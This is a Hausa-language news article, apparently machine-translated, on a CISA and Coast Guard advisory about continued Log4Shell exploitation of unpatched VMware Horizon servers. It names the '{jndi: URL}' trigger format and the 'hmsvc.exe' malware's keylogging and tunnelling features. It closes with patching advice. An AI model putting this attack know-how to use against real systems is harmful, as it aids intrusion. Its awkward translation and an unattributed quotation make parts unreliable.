Hukumar Tsaro ta Intanet ta Amurka (CISA) da Dokar Kula da Intanet ta Coast Guard (CGCYBER) sun sanar ta hanyar ba da shawara kan tsaro ta Intanet (CSA) cewa Log4Shell rashin lahani (CVE-2021-44228) har yanzu masu kutse suna cin gajiyar su.
Daga cikin kungiyoyin hacker da aka gano wadanda har yanzu suna cin gajiyar rauni wannan "APT" kuma an gano cewa An kai hari kan sabar VMware Horizon da Ƙofar Samun Haɗin Kai (UAG) don samun dama ga ƙungiyoyin da ba su yi amfani da faci ba.
CSA tana ba da bayanai, gami da dabaru, dabaru, da matakai da alamun sasantawa, waɗanda aka samo daga alƙawuran amsawa guda biyu masu alaƙa da binciken malware na samfuran da aka gano akan hanyoyin sadarwar da abin ya shafa.
Ga wadanda ba su sani bae Log4Shell, ya kamata ku san cewa wannan rauni ne wanda ya fara bayyana a watan Disamba kuma ya yi niyya ga raunin da ya faru An samo a cikin Apache Log4j, wanda aka siffanta shi azaman sanannen tsari don tsara shiga cikin aikace-aikacen Java, yana ba da damar aiwatar da lambar sabani lokacin da aka rubuta ƙima ta musamman ga wurin yin rajista a cikin tsarin "{jndi: URL}".
Ularfafawa Yana da sananne saboda ana iya kai harin a aikace-aikacen Java cewaSuna rikodin ƙimar da aka samo daga tushen waje, misali ta hanyar nuna ƙima mai matsala a cikin saƙonnin kuskure.
An lura cewa Kusan duk ayyukan da ke amfani da tsarin kamar Apache Struts, Apache Solr, Apache Druid ko Apache Flink sun shafi, ciki har da Steam, Apple iCloud, abokan ciniki na Minecraft da sabobin.
Cikakken faɗakarwa yayi cikakken bayani game da lokuta da yawa na baya-bayan nan inda masu kutse suka yi nasarar yin amfani da raunin don samun damar shiga. Aƙalla ɗaya da aka tabbatar da sasantawa, ƴan wasan sun tattara tare da fitar da mahimman bayanai daga hanyar sadarwar wanda abin ya shafa.
Binciken barazanar da Hukumar Kula da Intanet ta Coast Guard ta Amurka ta yi ya nuna cewa masu yin barazanar sun yi amfani da Log4Shell don samun hanyar shiga cibiyar sadarwa ta farko daga wanda aka azabtar da ba a bayyana ba. Sun ɗora fayil ɗin “hmsvc.exe.” malware, wanda ke keɓanta azaman kayan aikin tsaro na Microsoft Windows SysInternals LogonSessions.
Mai aiwatarwa a cikin malware ɗin yana ƙunshe da iyakoki daban-daban, gami da shigar da bugun maɓalli da aiwatar da ƙarin kayan biya, kuma yana ba da tsarin mai amfani da hoto don isa ga tsarin tebur na Windows wanda abin ya shafa. Yana iya aiki azaman wakili-da-control tunneling proxy, yana barin mai aiki mai nisa ya ƙara zuwa cikin hanyar sadarwa, in ji hukumomin.
Binciken ya kuma gano cewa hmsvc.exe yana gudana a matsayin asusun tsarin gida tare da mafi girman matakin gata, amma bai bayyana yadda maharan suka daukaka gatansu ba har zuwa wannan lokacin.
CISA da Coast Guard sun bada shawarar cewa duk kungiyoyi shigar da sabuntawa don tabbatar da cewa tsarin VMware Horizon da UAG abin ya shafa gudu latest version.
Fadakarwar ta kara da cewa ya kamata kungiyoyi su ci gaba da sabunta manhajojin su na zamani tare da ba da fifikon fakewa sanannun raunin da aka yi amfani da su. Ya kamata a rage girman kai hari da ke fuskantar Intanet ta hanyar ɗaukar muhimman ayyuka a cikin yanki mai ɓarna.
"Bisa adadin sabar Horizon a cikin bayananmu waɗanda ba a daidaita su ba (kashi 18 cikin ɗari kawai an daidaita su a daren Juma'ar da ta gabata), akwai babban haɗarin cewa hakan zai yi tasiri sosai ga ɗaruruwa, idan ba dubbai, na kasuwanci ba. . Wannan karshen mako kuma shine karo na farko da muka ga shaidar tabarbarewar taruwar jama'a, daga samun damar farko zuwa fara daukar mataki na gaba akan sabar Horizon."
Yin haka yana tabbatar da tsauraran ikon shiga zuwa kewayen cibiyar sadarwa kuma baya ɗaukar ayyukan fuskantar Intanet waɗanda basu da mahimmanci ga ayyukan kasuwanci.
CISA da CGCYBER suna ƙarfafa masu amfani da masu gudanarwa don sabunta duk tsarin VMware Horizon da UAG da abin ya shafa zuwa sabbin nau'ikan. Idan ba a yi amfani da sabuntawar ko wuraren aiki ba nan da nan bayan an fitar da sabuntawar VMware don Log4Shell, bi duk tsarin VMware da abin ya shafa kamar yadda aka daidaita. Duba CSA Malicious Cyber Actors Ci gaba da Amfani da Log4Shell akan Tsarin VMware Horizon don ƙarin bayani da ƙarin shawarwari.
Finalmente idan kuna sha'awar ƙarin sani game da shi, zaka iya duba bayanan A cikin mahaɗin mai zuwa.